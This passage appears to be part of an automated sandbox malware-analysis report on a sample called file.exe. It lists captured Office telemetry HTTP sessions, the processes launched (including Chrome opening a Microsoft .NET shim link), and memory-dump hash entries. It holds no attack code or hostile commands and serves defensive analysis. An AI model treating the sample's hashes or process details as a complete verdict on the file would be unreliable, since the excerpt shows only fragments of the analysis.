                                                                                                                                                                                        2024-11-24 01:14:22 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:23 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1406
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                        ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                        x-ms-request-id: e8ec328a-c01e-0049-1675-3cac27000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011423Z-174c587ffdfgcs66hC1TEB69cs00000003gg00000000kn39
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:23 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        148192.168.2.54991813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:22 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:23 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1369
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                        x-ms-request-id: 4e23fa7b-901e-0048-7ba0-3bb800000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011423Z-15b8b599d88tmlzshC1TEB4xpn00000003q0000000004src
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:23 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        149192.168.2.54991913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:24 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:24 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1414
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                        x-ms-request-id: f390f01b-d01e-0017-588c-3ab035000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011424Z-174c587ffdfmrvb9hC1TEBtn3800000003m000000000u6pm
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:25 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:20:12:58
                                                                                                                                                                                        Start date:23/11/2024
                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                        Imagebase:0x8c0000
                                                                                                                                                                                        File size:1'891'328 bytes
                                                                                                                                                                                        MD5 hash:89A84EB8A83E3072365849AF60F40DCC
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:20:13:35
                                                                                                                                                                                        Start date:23/11/2024
                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:20:13:35
                                                                                                                                                                                        Start date:23/11/2024
                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 --field-trial-handle=2332,i,7438478652651464284,9822841454251947196,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:20:13:39
                                                                                                                                                                                        Start date:23/11/2024
                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:20:13:39
                                                                                                                                                                                        Start date:23/11/2024
                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,12934382445748236653,13668332504761590760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Reset < >
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000003.2355180258.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Offset: 007F1000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_7ec000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: |
                                                                                                                                                                                          • API String ID: 0-2343686810
                                                                                                                                                                                          • Opcode ID: 5f3a0f7cba8eee4745f2d432516cab0aae1b55ac0aaaf077eb5db9441624d19e
                                                                                                                                                                                          • Instruction ID: aeaaab04bd2595f9214be6b90cdb8b67c7ae08c1e6a634da26c921d21b0eb15c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f3a0f7cba8eee4745f2d432516cab0aae1b55ac0aaaf077eb5db9441624d19e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4841E36250EBC55FD3138B749C697A1BFB0AF27214F1E86DBC1C58B5A3E2285909C722
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000003.2355180258.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Offset: 007F2000, based on PE: false
                                                                                                                                                                                          • Associated: 00000000.00000003.2256531429.00000000007F2000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_7ec000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: |
                                                                                                                                                                                          • API String ID: 0-2343686810
                                                                                                                                                                                          • Opcode ID: 4a60fe230c1f3a299da71ac6205afbb1960eb101c87e1fb9e0d0b8591716c2e5
                                                                                                                                                                                          • Instruction ID: aeaaab04bd2595f9214be6b90cdb8b67c7ae08c1e6a634da26c921d21b0eb15c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a60fe230c1f3a299da71ac6205afbb1960eb101c87e1fb9e0d0b8591716c2e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4841E36250EBC55FD3138B749C697A1BFB0AF27214F1E86DBC1C58B5A3E2285909C722
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000003.2355180258.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Offset: 007EC000, based on PE: false
                                                                                                                                                                                          • Associated: 00000000.00000003.2177579165.00000000007EC000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_7ec000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: |
                                                                                                                                                                                          • API String ID: 0-2343686810
                                                                                                                                                                                          • Opcode ID: 9b29b6185e0b770f731500aef71b700a2760b675ae296dcbac5f50ac0fe6b521
                                                                                                                                                                                          • Instruction ID: 984ea861bc3b1ed859b50efe0c7cedf3eb423db3e2036e3a1e6885e6e89ff607
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b29b6185e0b770f731500aef71b700a2760b675ae296dcbac5f50ac0fe6b521
                                                                                                                                                                                          • Instruction Fuzzy Hash: A841056250EBC55FD3178B748C687A5BFB0AF27214F1E85DFC1C58B5A3E2294809C722
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000003.2355180258.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Offset: 007EF000, based on PE: false
                                                                                                                                                                                          • Associated: 00000000.00000003.2177579165.00000000007EC000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_7ec000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: |
                                                                                                                                                                                          • API String ID: 0-2343686810
                                                                                                                                                                                          • Opcode ID: 9b29b6185e0b770f731500aef71b700a2760b675ae296dcbac5f50ac0fe6b521
                                                                                                                                                                                          • Instruction ID: 984ea861bc3b1ed859b50efe0c7cedf3eb423db3e2036e3a1e6885e6e89ff607
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b29b6185e0b770f731500aef71b700a2760b675ae296dcbac5f50ac0fe6b521
                                                                                                                                                                                          • Instruction Fuzzy Hash: A841056250EBC55FD3178B748C687A5BFB0AF27214F1E85DFC1C58B5A3E2294809C722